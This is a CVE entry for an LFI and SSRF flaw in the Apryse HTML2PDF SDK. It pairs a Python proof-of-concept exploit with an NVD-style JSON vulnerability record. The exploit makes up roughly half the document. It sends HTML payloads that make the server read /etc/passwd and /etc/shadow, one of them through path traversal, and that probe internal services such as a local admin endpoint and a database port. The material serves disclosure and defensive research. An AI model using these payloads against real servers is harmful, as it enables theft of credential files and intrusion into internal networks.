CVE-2025-56589

# CVE-2025-56589 PoC - Apryse HTML2PDF SDK LFI and SSRF # LFI PoC - Read local file import requests url = "http://target-server/api/InsertFromHtmlString" headers = {"Content-Type": "text/html"} # LFI payload - Read /etc/passwd lfi_payload = """ <html> <body> <img src="file:///etc/passwd" /> </body> </html> """ response = requests.post(url, data=lfi_payload, headers=headers) print("LFI Response:", response.text) # SSRF PoC - Access internal service ssrf_payload = """ <html> <body> <img src="http://127.0.0.1:8080/admin" /> </body> </html> """ response = requests.post(url, data=ssrf_payload, headers=headers) print("SSRF Response:", response.text) # Combined PoC - Path traversal + SSRF combined_payload = """ <html> <body> <img src="file:///var/www/html/../../../etc/shadow" /> <img src="http://internal-db:3306/" /> </body> </html> """ response = requests.post(url, data=combined_payload, headers=headers) print("Combined Response:", response.text)

{"cve": {"id": "CVE-2025-56589", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:15:58.183", "lastModified": "2026-02-02T20:09:27.567", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Local File Inclusion (LFI) and a Server-Side Request Forgery (SSRF) vulnerability was found in the InsertFromHtmlString() function of the Apryse HTML2PDF SDK thru 11.6.0. These vulnerabilities could allow an attacker to read local files on the server or make arbitrary HTTP requests to internal or external services. Both vulnerabilities could lead to the disclosure of sensitive data or potential system takeover."}, {"lang": "es", "value": "Una inclusión local de ficheros (LFI) y una vulnerabilidad de falsificación de petición del lado del servidor (SSRF) fue encontrada en la función InsertFromHtmlString() del SDK Apryse HTML2PDF hasta la versión 11.6.0. Estas vulnerabilidades podrían permitir a un atacante leer ficheros locales en el servidor o realizar peticiones HTTP arbitrarias a servicios internos o externos. Ambas vulnerabilidades podrían llevar a la divulgación de datos sensibles o a una potencial toma de control del sistema."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apryse:html2pdf:*:*:*:*:*:*:*:*", "versionEndIncluding": "11.7.0", "matchCriteriaId": "29DBED2C-0D66-48F8-B539-D3A0B39E95D4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:apryse:html2pdf:11.10.0:*:*:*:*:*:*:*", "matchCriteriaId": "F5AD5BCA-FF3F-4C6B-91DF-00CA12E4C82E"}]}]}], "references": [{"url": "http://apryse.com", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.stratascale.com/resource/apryse-server-module-ssrf-lfi/", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.stratascale.com/resource/apryse-server-module-ssrf-lfi/", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}